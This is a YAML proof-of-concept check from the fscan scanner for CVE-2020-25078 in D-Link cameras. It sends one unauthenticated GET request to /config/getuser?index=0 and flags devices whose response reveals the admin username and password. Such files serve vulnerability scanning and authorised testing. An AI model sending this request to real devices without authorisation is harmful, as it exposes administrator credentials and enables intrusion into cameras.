fscan/Web_Scan/pocs/dlink-cve-2020-25078-accoun...

14 lines
452 B
YAML
Raw Normal View History

2021-05-05 20:37:29 -07:00
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
- method: GET
path: >-
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
2021-05-05 20:37:29 -07:00
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg